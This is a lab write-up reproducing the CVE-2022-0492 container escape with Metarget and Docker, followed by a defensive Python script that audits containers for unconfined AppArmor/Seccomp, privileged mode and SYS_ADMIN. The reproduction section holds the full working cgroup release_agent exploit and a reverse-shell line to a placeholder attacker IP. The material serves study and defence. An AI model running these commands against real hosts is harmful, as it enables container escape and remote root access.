
Container escape via a Linux kernel vulnerability (CVE-2022-0492)

Scenario

See the Unit42 article.

Environment setup

Host environment:

  • Ubuntu 18.04

First switch the kernel; install the environment directly with Metarget:

./metarget cnv install cve-2022-0492 --verbose

Base environment (Docker as the example; skip this step if any version of Docker is already installed):

./metarget gadget install docker --version 18.03.1

Reproducing the vulnerability

First start a reverse shell listener somewhere:

# ATTACKER-IP
ncat -lvnp 4444

Then create a container with AppArmor and Seccomp disabled and reproduce the issue inside it:

root@test:~# docker run -it --security-opt apparmor=unconfined --security-opt seccomp=unconfined --rm ubuntu /bin/bash
root@dbfb1efb9b71:/# unshare -UrmC bash
root@dbfb1efb9b71:/# mount -it cgroup -o rdma cgroup /mnt
root@dbfb1efb9b71:/# d=`dirname $(ls -x /mnt/r* |head -n1)`
root@dbfb1efb9b71:/# mkdir -p $d/w;echo 1 >$d/w/notify_on_release
root@dbfb1efb9b71:/# printf '#!/bin/bash\n/bin/bash -i >& /dev/tcp/ATTACKER-IP/4444 0>&1' > /exp.sh; chmod 777 /exp.sh
root@dbfb1efb9b71:/# t=`sed -n 's/.*\perdir=\([^,]*\).*/\1/p' /etc/mtab`
root@dbfb1efb9b71:/# echo "$t/exp.sh" > $d/release_agent
root@dbfb1efb9b71:/# sh -c "echo 0 >$d/w/cgroup.procs"

A reverse shell is received at ATTACKER-IP:

...
Ncat: Connection from 1.2.3.4.
Ncat: Connection from 1.2.3.4:33868.
bash: cannot set terminal process group (-1): Inappropriate ioctl for device
bash: no job control in this shell
root@test:/#
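The reproduction above only works because the container was started with AppArmor and Seccomp disabled (the `--security-opt ... unconfined` flags). From a defender's side, the practical check is therefore an audit of running containers for exactly those settings, plus the two other ways a container commonly gains the same freedom (`--privileged` and an added `SYS_ADMIN` capability). The script below is an added example, not part of this Metarget write-up: it parses records shaped like the `HostConfig` part of `docker inspect` output. The container names and settings are constructed sample data, and the finding labels are this example's own.

```python
import json

# Constructed sample in the shape of `docker inspect <ctr> ...` output.
# These are not real containers; the values only illustrate the cases.
SAMPLE_INSPECT_JSON = json.dumps([
    {"Name": "/unconfined-test",
     "HostConfig": {"Privileged": False,
                    "SecurityOpt": ["apparmor=unconfined", "seccomp=unconfined"],
                    "CapAdd": None}},
    {"Name": "/priv-box",
     "HostConfig": {"Privileged": True, "SecurityOpt": None, "CapAdd": None}},
    {"Name": "/sysadmin-cap",
     "HostConfig": {"Privileged": False, "SecurityOpt": None, "CapAdd": ["SYS_ADMIN"]}},
    {"Name": "/hardened",
     "HostConfig": {"Privileged": False,
                    "SecurityOpt": ["no-new-privileges:true"],
                    "CapAdd": None,
                    "CapDrop": ["ALL"]}},
])


def _parse_security_opt(opt):
    """Split 'apparmor=unconfined' (current syntax) or 'seccomp:unconfined'
    (older syntax) into a lower-cased (key, value) pair."""
    for sep in ("=", ":"):
        if sep in opt:
            key, value = opt.split(sep, 1)
            return key.strip().lower(), value.strip().lower()
    return opt.strip().lower(), ""


def audit_container(record):
    """Return the list of risky settings found in one docker-inspect record.

    Labels (this example's own naming): privileged, apparmor_unconfined,
    seccomp_unconfined, cap_sys_admin.
    """
    host = record.get("HostConfig") or {}
    findings = []
    if host.get("Privileged"):
        findings.append("privileged")
    for opt in host.get("SecurityOpt") or []:
        key, value = _parse_security_opt(opt)
        if key == "apparmor" and value == "unconfined":
            findings.append("apparmor_unconfined")
        if key == "seccomp" and value == "unconfined":
            findings.append("seccomp_unconfined")
    # CapAdd entries may be written with or without the CAP_ prefix.
    caps = set()
    for cap in host.get("CapAdd") or []:
        cap = cap.upper()
        caps.add(cap[4:] if cap.startswith("CAP_") else cap)
    if "SYS_ADMIN" in caps:
        findings.append("cap_sys_admin")
    return findings


def audit_inspect_output(inspect_json):
    """Map container name -> findings for every container that has at least one."""
    result = {}
    for record in json.loads(inspect_json):
        findings = audit_container(record)
        if findings:
            result[record.get("Name", "?").lstrip("/")] = findings
    return result


if __name__ == "__main__":
    # On a real host: docker inspect $(docker ps -q) | python3 this_script.py
    for name, findings in audit_inspect_output(SAMPLE_INSPECT_JSON).items():
        print(f"{name}: {', '.join(findings)}")
```

Against the constructed sample, `unconfined-test` is reported with both `apparmor_unconfined` and `seccomp_unconfined`, `priv-box` with `privileged`, `sysadmin-cap` with `cap_sys_admin`, and the `hardened` container produces no finding. On a live host, feed the output of `docker inspect` over all running container IDs into `audit_inspect_output` and treat any result as a container to restrict or rebuild with the default profiles.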